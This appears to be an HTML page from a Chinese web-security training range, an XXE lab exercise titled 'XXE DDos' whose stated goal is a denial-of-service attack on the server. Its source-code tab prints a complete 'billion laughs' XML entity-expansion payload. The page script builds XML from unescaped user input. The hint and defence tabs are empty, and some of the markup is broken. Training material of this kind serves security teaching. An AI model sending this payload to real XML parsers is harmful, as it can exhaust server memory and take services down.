<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title></title>
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport"
          content="width=device-width,user-scalable=yes, minimum-scale=0.4, initial-scale=0.8,target-densitydpi=low-dpi"/>
    <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/>
    <link rel="stylesheet" href="../../../statics/xadmin/css/font.css">
    <link rel="stylesheet" href="../../../statics/xadmin/css/xadmin.css">
    <link rel="stylesheet" href="../../../statics/ceber/css/mardown-css-jwsky.css">
    <link rel="stylesheet" href="../../../statics/ceber/css/highlight/arduino-light.css">

    <script type="text/javascript" src="../../../statics/xadmin/js/jquery.min.js"></script>
    <script src="../../../statics/xadmin/lib/layui/layui.js" charset="utf-8"></script>
    <script src="../../../statics/ceber/js/showdown.min.js" charset="utf-8"></script>
    <script src="../../../statics/ceber/js/ceber.js" charset="utf-8"></script>
    <script src="../../../statics/ceber/js/highlight.pack.js" charset="utf-8"></script>

    <style>
        .layui-tab-content {
            padding: 0px;
            padding-top: 10px;
        }

        input {
            margin-bottom: 10px;
        }
    </style>
</head>
<body>
<div class="x-body layui-anim layui-anim-up">
    <blockquote class="layui-elem-quote">XXE DDos</blockquote>
    <fieldset class="layui-elem-field">
        <legend>题目区</legend>
        <div class="layui-field-box">
            <div class="layui-row" style="vertical-align:bottom">
                <form class="layui-form" method="POST" name="form" contentType="application/xml"
                      action="/ceber-range/xxe/xxe1">
                    <input type="hidden" name="commentXml" id="commentXml"/>
                    <input type="text" name="commentStr" id="commentStr" placeholder="请输入留言" autocomplete="off"
                           class="layui-input">
                    <button type="button" class="layui-btn layui-btn-mini" onclick="ceberSubmitXXE(this);">发布</button>
                </form>
            </div>
            <div class="layui-row" id="comment-div">
            </div>
            <div class="layui-row" id="rs-message">
            </div>
            <div class="layui-row" id="rs-body">
            </div>
            <div class="layui-row" id="rs-hit">
            </div>
            <div class="layui-row" id="rs-bak">
            </div>
        </div>
    </fieldset>
    <fieldset class="layui-elem-field">
        <legend>解题区</legend>
        <div class="layui-tab layui-field-box">
            <ul class="layui-tab-title">
                <li class="layui-this">描述</li>
                <li>提示</li>
                <li>源代码</li>
                <li>攻击方法</li>
                <li>防御</li>
            </ul>
            <div class="layui-tab-content">
                <div class="layui-tab-item layui-show" id="mubiao">描述</div>
                <div class="layui-tab-item" id="tishi">提示</div>
                <div class="layui-tab-item" id="yuandaima">源代码</div>
                <div class="layui-tab-item" id="gongjifangfa">攻击方法</div>
                <div class="layui-tab-item" id="fangyu">防御</div>
            </div>
        </div>
    </fieldset>

    <code id="mubiao_source" style="display:none">
        <script type='text/html' style='display:block'>
            对服务器进行DDos攻击

        </script>
        <
        /code>

        < code
        id = "tishi_source"
        style = "display:none" >
            < script
        type = 'text/html'
        style = 'display:block' >


        </script>
    </code>

    <code id="yuandaima_source" style="display:none">
        <script type='text/html' style='display:block'>
            ```xml
            <?xml version="1.0"?>
            <!DOCTYPE lolz [
            <!ENTITY lol "lol">
            <!ELEMENT lolz (#PCDATA)>
            <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
            <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
            <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
            <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
            <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
            <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
            <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
            <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
            <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
            ]>
            <lolz>&lol9;</lolz>
            ```

        </script>
        <
        /code>

        < code
        id = "gongjifangfa_source"
        style = "display:none" >
            < script
        type = 'text/html'
        style = 'display:block' >

        </script>
    </code>

    <code id="fangyu_source" style="display:none">
        <script type='text/html' style='display:block'>


        </script>
        <
        /code>
        < blockquote
        class
        = "layui-elem-quote layui-quote-nm" > 持续集成 < /blockquote>
            < /div>
            < /body>

            < script >
            $(function () {
                //加载弹出层
                layui.use(['form', 'element'],
                    function () {
                        layer = layui.layer;
                        element = layui.element;
                    });
                var converter = new showdown.Converter();
                $("#mubiao").html(converter.makeHtml($("#mubiao_source").html().substr(48)));
                $("#tishi").html(converter.makeHtml($("#tishi_source").html().substr(48)));
                $("#yuandaima").html(converter.makeHtml($("#yuandaima_source").html().substr(48)));
                $("#gongjifangfa").html(converter.makeHtml($("#gongjifangfa_source").html().substr(48)));
                $("#fangyu").html(converter.makeHtml($("#fangyu_source").html().substr(48)));
            });

        $(document).ready(function () {
            $('pre code').each(function (i, block) {
                hljs.highlightBlock(block);
            });
        });


        function getXml() {
            var commentInput = $("#commentStr").val();
            var xml = '<?xml version="1.0"?>' +
                '<comment>' +
                '  <text>' + commentInput + '</text>' +
                '</comment>';
            return xml;
        }

        function ceberSubmitXXE(e) {
            var a = e;
            var parent = a.parentNode;
            while (parent.tagName == "form") {
                parent = parent.parentNode;
            }
            curForm = parent;
            var formUrl = $(curForm).attr('action');
            var formMethod = $(curForm).attr('method');
            var contentType = ($(curForm).attr('contentType')) ? $(curForm).attr('contentType') : 'application/x-www-form-urlencoded; charset=UTF-8';
            var submitData = $(curForm).serialize();
            $.ajax({
                url: "/ceber-range/xxe/xxe3",
                method: "POST",
                contentType: "application/xml",
                data: getXml(),
                success: function (data) {
                    console.log(data);
                    rs = data;
                    $("#rs-message").html(rs.code + " " + rs.message);
                    $("#rs-body").html(rs.body);
                    $("#rs-hit").html(rs.hit);
                    $("#rs-bak").html(rs.bak);
                    $("#comment-div").val('');
                },
                error: function (jqXHR, textStatus, errorThrown) {
                    /*错误信息处理*/
                    console.error(jqXHR);
                    console.error(textStatus);
                    console.error(errorThrown);
                }
            });
            return false;
        }

        </script>
</html>